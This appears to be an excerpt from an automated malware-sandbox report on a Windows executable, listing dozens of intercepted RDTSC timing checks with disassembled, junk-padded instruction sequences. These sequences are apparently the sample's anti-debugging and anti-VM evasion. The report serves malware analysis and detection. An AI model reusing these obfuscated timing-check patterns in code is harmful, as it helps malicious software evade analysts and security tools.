Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090469 second address: 509046D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 509046D second address: 5090483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50807F3 second address: 508081C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BC10B70A5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 508081C second address: 5080864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5BC10A35FEh 0x0000000f push eax 0x00000010 jmp 00007F5BC10A35FBh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5BC10A3605h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080864 second address: 5080885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 2CCD668Eh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080885 second address: 50808BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5BC10A3603h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BC10A3605h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50808BC second address: 5080976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov ax, 9C03h 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 sub ebx, ebx 0x00000016 pushad 0x00000017 call 00007F5BC10B70A1h 0x0000001c call 00007F5BC10B70A0h 0x00000021 pop esi 0x00000022 pop edx 0x00000023 movzx ecx, di 0x00000026 popad 0x00000027 test esi, esi 0x00000029 jmp 00007F5BC10B70A3h 0x0000002e je 00007F5C32F5CB09h 0x00000034 pushad 0x00000035 mov edx, ecx 0x00000037 mov di, si 0x0000003a popad 0x0000003b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000042 pushad 0x00000043 mov eax, 6C15080Fh 0x00000048 pushfd 0x00000049 jmp 00007F5BC10B70A4h 0x0000004e or esi, 68FBD5B8h 0x00000054 jmp 00007F5BC10B709Bh 0x00000059 popfd 0x0000005a popad 0x0000005b mov ecx, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F5BC10B70A5h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080976 second address: 508097C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 508097C second address: 5080980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080980 second address: 50809CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5C32F49011h 0x0000000e pushad 0x0000000f mov bx, 2F48h 0x00000013 pushfd 0x00000014 jmp 00007F5BC10A3601h 0x00000019 sub ax, 01B6h 0x0000001e jmp 00007F5BC10A3601h 0x00000023 popfd 0x00000024 popad 0x00000025 test byte ptr [76FB6968h], 00000002h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50809CA second address: 50809DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50809DD second address: 50809E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50809E3 second address: 5080A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5C32F5CA61h 0x0000000e jmp 00007F5BC10B70A7h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5BC10B70A0h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A1F second address: 5080A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A23 second address: 5080A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A29 second address: 5080A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A2F second address: 5080A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov ecx, 47B5C90Dh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov edi, ecx 0x00000017 mov ax, 7B27h 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d jmp 00007F5BC10B709Ah 0x00000022 xchg eax, ebx 0x00000023 jmp 00007F5BC10B70A0h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5BC10B709Eh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A8B second address: 5080A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A91 second address: 5080A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A95 second address: 5080A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080AF4 second address: 5080AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080AF8 second address: 5080AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080AFC second address: 5080B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B02 second address: 5080B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B08 second address: 5080B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B23 second address: 5080B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B27 second address: 5080B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B2D second address: 5080B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esp, ebp 0x0000000c jmp 00007F5BC10A35FCh 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BC10A3607h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090E0F second address: 5090E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BC10B70A1h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F5BC10B70A1h 0x0000000f and eax, 6C1D6216h 0x00000015 jmp 00007F5BC10B70A1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 movzx eax, dx 0x00000024 push eax 0x00000025 push edx 0x00000026 call 00007F5BC10B709Fh 0x0000002b pop ecx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090E69 second address: 5090E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090E6D second address: 5090EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5BC10B709Eh 0x00000011 adc si, D098h 0x00000016 jmp 00007F5BC10B709Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F5BC10B70A8h 0x00000022 or ax, 7AF8h 0x00000027 jmp 00007F5BC10B709Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090BF7 second address: 5090C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A35FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090C09 second address: 5090C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5BC10B70A6h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5BC10B70A7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090C4C second address: 5090C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A3604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51107B4 second address: 51107BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51107BA second address: 51107D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51007E7 second address: 5100874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 xor ax, 0778h 0x0000000e jmp 00007F5BC10B709Bh 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov dx, cx 0x0000001f mov ebx, eax 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007F5BC10B709Fh 0x00000029 push ecx 0x0000002a push edi 0x0000002b pop esi 0x0000002c pop edi 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 jmp 00007F5BC10B709Ch 0x00000035 movzx eax, dx 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b pushad 0x0000003c mov dh, 71h 0x0000003e pushad 0x0000003f call 00007F5BC10B70A2h 0x00000044 pop esi 0x00000045 mov ax, dx 0x00000048 popad 0x00000049 popad 0x0000004a pop ebp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5BC10B709Fh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100874 second address: 5100891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C06 second address: 5100C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C0A second address: 5100C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C10 second address: 5100C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5BC10B70A3h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F5BC10B70A6h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov ax, 78CDh 0x0000001e pushfd 0x0000001f jmp 00007F5BC10B709Ah 0x00000024 jmp 00007F5BC10B70A5h 0x00000029 popfd 0x0000002a popad 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C76 second address: 5100C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 push dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov dl, D8h 0x0000000f pop ecx 0x00000010 movsx edx, ax 0x00000013 popad 0x00000014 push EBF1B5B1h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5BC10A35FAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C9B second address: 5100CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CA1 second address: 5100CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CA5 second address: 5100CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CA9 second address: 5100CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 140F4A51h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CBE second address: 5100CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CC4 second address: 5100CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CEC second address: 5100CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CF0 second address: 5100D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100D0B second address: 5100D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0573 second address: 50B0598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BC10A3601h 0x00000008 pop eax 0x00000009 mov bh, A6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 push eax 0x00000014 push edx 0x00000015 mov si, 43A7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0598 second address: 50B0617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F5BC10B709Fh 0x0000000f sbb ecx, 62E64EEEh 0x00000015 jmp 00007F5BC10B70A9h 0x0000001a popfd 0x0000001b call 00007F5BC10B70A0h 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F5BC10B70A7h 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d jmp 00007F5BC10B70A4h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0617 second address: 50B06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push FFFFFFFEh 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop esi 0x0000000b mov ecx, edi 0x0000000d popad 0x0000000e push 3CB6DE44h 0x00000013 jmp 00007F5BC10A35FAh 0x00000018 add dword ptr [esp], 3A42E1D4h 0x0000001f jmp 00007F5BC10A3600h 0x00000024 push 52A31B2Bh 0x00000029 jmp 00007F5BC10A3601h 0x0000002e xor dword ptr [esp], 2453B52Bh 0x00000035 pushad 0x00000036 mov ecx, 4A3D7693h 0x0000003b mov cx, E8EFh 0x0000003f popad 0x00000040 mov eax, dword ptr fs:[00000000h] 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F5BC10A3600h 0x0000004d adc esi, 04558318h 0x00000053 jmp 00007F5BC10A35FBh 0x00000058 popfd 0x00000059 mov dl, ah 0x0000005b popad 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F5BC10A35FAh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B06AF second address: 50B06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B06B3 second address: 50B06B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B06B9 second address: 50B0708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6E53h 0x00000007 pushfd 0x00000008 jmp 00007F5BC10B70A8h 0x0000000d sbb ecx, 405007D8h 0x00000013 jmp 00007F5BC10B709Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5BC10B70A5h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0708 second address: 50B073C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5BC10A3608h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B073C second address: 50B0740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0740 second address: 50B0746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0746 second address: 50B0772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5BC10B70A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov si, A1C3h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0772 second address: 50B07E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b call 00007F5BC10A35FCh 0x00000010 pushfd 0x00000011 jmp 00007F5BC10A3602h 0x00000016 xor si, 22E8h 0x0000001b jmp 00007F5BC10A35FBh 0x00000020 popfd 0x00000021 pop esi 0x00000022 mov dh, F3h 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F5BC10A35FCh 0x0000002f sbb ax, 3548h 0x00000034 jmp 00007F5BC10A35FBh 0x00000039 popfd 0x0000003a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B07E3 second address: 50B082F instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BC10B70A9h 0x00000013 jmp 00007F5BC10B709Bh 0x00000018 popfd 0x00000019 jmp 00007F5BC10B70A8h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B082F second address: 50B088C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F5BC10A3606h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F5BC10A3600h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F5BC10A35FCh 0x0000001f add ecx, 67D109F8h 0x00000025 jmp 00007F5BC10A35FBh 0x0000002a popfd 0x0000002b mov ebx, ecx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B088C second address: 50B08A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B08A0 second address: 50B08D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F5BC10A3607h 0x0000000e mov eax, dword ptr [76FBB370h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5BC10A3600h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B08D9 second address: 50B08DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B08DF second address: 50B08E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B08E5 second address: 50B0927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b jmp 00007F5BC10B70A4h 0x00000010 xor eax, ebp 0x00000012 jmp 00007F5BC10B70A1h 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5BC10B709Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0927 second address: 50B092C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
